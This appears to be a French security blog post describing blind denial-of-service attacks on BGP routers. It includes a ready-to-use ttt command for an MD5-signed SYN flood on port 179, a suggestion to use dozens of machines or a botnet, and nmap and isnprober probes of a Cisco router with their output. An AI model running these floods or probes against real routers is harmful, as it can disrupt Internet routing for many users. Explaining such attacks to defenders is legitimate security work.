Attaques DoS « aveugles » sur les routeurs BGP. 1
Aveugles, nous appellerons les attaques qui ne nécessitent aucune connaissance supplémentaire autre que l'adresse IP du routeur BGP. Le scénario le plus simple d'une telle attaque DoS est SYN flood sur le port TCP 179. Pour mettre en œuvre une telle attaque sur un routeur industriel, vous devez utiliser plusieurs dizaines d'ordinateurs, et mieux un bot-réseau.
Une façon plus intéressante d'« inonder » un routeur BGP cible utilisant l'authentification MD5 consiste à appliquer des paquets TCP SYN avec des signatures MD5. Cette attaque permet d'ajouter une charge de calcul au traitement MD5 par le routeur attaqué.
Une telle attaque est facile à réaliser avec l'utilitaire TTT avec l'option md5. Pour optimiser l'inondation, plusieurs instances de ttt doivent être exécutées sur plusieurs dizaines de machines.
Voici un exemple d'utilisation de l'utilitaire ttt:
arhontus# ./ttt --flood 10000000 -y 11006 --syn --md5
allyourbgparebelongtous -D 192.168.66.191 && ./ttt --flood 10000000 -y
179 --syn --md5 allyourbgparebelongtous -D 192.168.66.191
En ce qui concerne le matériel fabriqué par Cisco Systems, il convient de mentionner la possibilité d'implémenter des attaques de débordement de pile TCP/IP IOS. Pour identifier ces vulnérabilités, vous pouvez utiliser des scanneurs de vulnérabilité tels que Nmap, hping2 et isnprober.
Voici un exemple pour le routeur Cisco 2600:
kali# nmap -sS -O -vvvv 192.168.66.215
<skip>
TCP Sequence Prediction: class="truly" random
Difficulty=9999999 (Good luck!)
TCP ISN Seq. Numbers: 5142798B A95D7AC9 71F42B5A 4D684349 FF2B94D4 B764FD5C
<skip> arhontus# # perl isnprober.pl -n 10 -i eth0 -p 23 192.168.66.215
-- ISNprober / 1.02 / Tom Vandepoel (Tom.Vandepoel@ubizen.com) --
Using eth0:192.168.77.5
Probing host: 192.168.66.215 on TCP port 23.
Host:port ISN Delta
192.168.66.202:23 -1154503313
192.168.66.202:23 -24125463 1130377850
192.168.66.202:23 2031059534 2055184997
192.168.66.202:23 965205234 -1065854300
192.168.66.202:23 -1974685094 -2939890328
192.168.66.202:23 1760147902 3734832996
192.168.66.202:23 2089287258 329139356
192.168.66.202:23 -923724721 -3013011979
192.168.66.202:23 -934490140 -10765419
192.168.66.202:23 -1262713275 -328223135
En général, le protocole de routage BGP version 4 fait partie intégrante de l'Internet moderne et, par conséquent, les problèmes de fonctionnement de ce protocole auront certainement une incidence sur le fonctionnement du réseau étendu. Par conséquent, si l'administrateur système est responsable de la maintenance des routeurs BGP (généralement des fournisseurs), il est nécessaire de prendre au sérieux les menaces potentielles et de prendre des mesures de protection à l'avance.
Petukhov Oleg, avocat en droit international et protection des renseignements personnels, spécialiste de l'information sécurité, protection de l'information et des données personnelles.
Canal Telegram: https://t.me/protecciondelainformacion
Groupe au Télégramme: https://t.me/securiteinformatique2
Site: https://legascom.ru
Courriel: online@legascom.ru
#sécuritéinformations #informationsécurité




